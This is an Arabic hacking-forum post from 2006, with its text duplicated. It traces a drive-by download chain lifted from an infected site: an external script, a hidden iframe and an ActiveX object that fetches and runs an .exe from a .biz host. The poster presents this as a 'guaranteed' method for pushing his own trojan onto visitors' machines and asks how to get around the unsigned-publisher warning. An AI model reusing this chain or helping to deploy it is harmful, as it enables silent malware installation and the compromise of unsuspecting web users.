hacklove
08-19-2006, 03:35 PM
السلام عليكم
ثغرة خطيرة جدا ومضمونة 100 % لو استعملت بالطريقة الصحيحة
"الباتش الموقع"
اكتشفت الطريقة بالصدفةعند زيارتي للموقع نبهني الكاسبر عن وجود عدد من الفايروسات والتروخانات والداونلودرات في جهازي
قمت باستخراج كود الHTML لصفحة الموقع وجدت في السطر 29 الكود التالي :
===================================
<****** language="Java******" type="text/java******" src="http://code.trasferimento.biz/l/35.js"></******>
===================================
قمت بتحميل (http://code.trasferimento.biz/l/35.js) وفتحته بالمفكرة فوجدت مايلي:
===================================
<!--
********.write('<i***** style="display:none" width="1" height="1" src="http://code.trasferimento.biz/l/35.html"></i*****>');
-->
===================================
قمت بزيارة الصفحة (http://code.trasferimento.biz/l/35.html) استخرجت الكود فوجدت ما يلي :
===================================
<OBJECT id="A" codeBase="http://code.trasferimento.biz/l/d23101c2179b79a09f986d4cdaaa4719_35.exe" height="1" width="1" classid="CLSID:00000000-0000-0000-0000-100000000003"><PARAM NAME="id" VALUE="35"></OBJECT>
===================================
وصلنا الان للاهم لان الكود السابق للجافا لم يكن الا تغطية وتمويه...
كود ال HTML يسمح بتحميل الباتش ونشغيله تلقائيا
ملاحظة:اذا استعمل برنامج DAP او "Internet Download Manager " فان التحميل يكون ظاهرا
===================================
قمت بتعويض الرابط في الكود بروابط لتحميل برامج اخري (paltalk .bearshare .....) فحملو وشغلو تلقائيا.
قمت بتعويض الرابط برابط الباتش الذي صممته فطلعت لي هذه الرسالة :
"ويندوز اقافت هذا البرنامج لان الايديتور مجهول" لاحظ الصورة:
لكن كيف يمكن لباتش مليء بالفايروسات ان يكون موقعا ؟؟؟؟؟؟؟؟؟؟
ثغرة خطيرة جدا ومضمونة 100 % لو استعملت بالطريقة الصحيحة
"الباتش الموقع"
اكتشفت الطريقة بالصدفةعند زيارتي للموقع نبهني الكاسبر عن وجود عدد من الفايروسات والتروخانات والداونلودرات في جهازي
قمت باستخراج كود الHTML لصفحة الموقع وجدت في السطر 29 الكود التالي :
===================================
<****** language="Java******" type="text/java******" src="http://code.trasferimento.biz/l/35.js"></******>
===================================
قمت بتحميل (http://code.trasferimento.biz/l/35.js) وفتحته بالمفكرة فوجدت مايلي:
===================================
<!--
********.write('<i***** style="display:none" width="1" height="1" src="http://code.trasferimento.biz/l/35.html"></i*****>');
-->
===================================
قمت بزيارة الصفحة (http://code.trasferimento.biz/l/35.html) استخرجت الكود فوجدت ما يلي :
===================================
<OBJECT id="A" codeBase="http://code.trasferimento.biz/l/d23101c2179b79a09f986d4cdaaa4719_35.exe" height="1" width="1" classid="CLSID:00000000-0000-0000-0000-100000000003"><PARAM NAME="id" VALUE="35"></OBJECT>
===================================
وصلنا الان للاهم لان الكود السابق للجافا لم يكن الا تغطية وتمويه...
كود ال HTML يسمح بتحميل الباتش ونشغيله تلقائيا
ملاحظة:اذا استعمل برنامج DAP او "Internet Download Manager " فان التحميل يكون ظاهرا
===================================
قمت بتعويض الرابط في الكود بروابط لتحميل برامج اخري (paltalk .bearshare .....) فحملو وشغلو تلقائيا.
قمت بتعويض الرابط برابط الباتش الذي صممته فطلعت لي هذه الرسالة :
"ويندوز اقافت هذا البرنامج لان الايديتور مجهول" لاحظ الصورة:
لكن كيف يمكن لباتش مليء بالفايروسات ان يكون موقعا ؟؟؟؟؟؟؟؟؟؟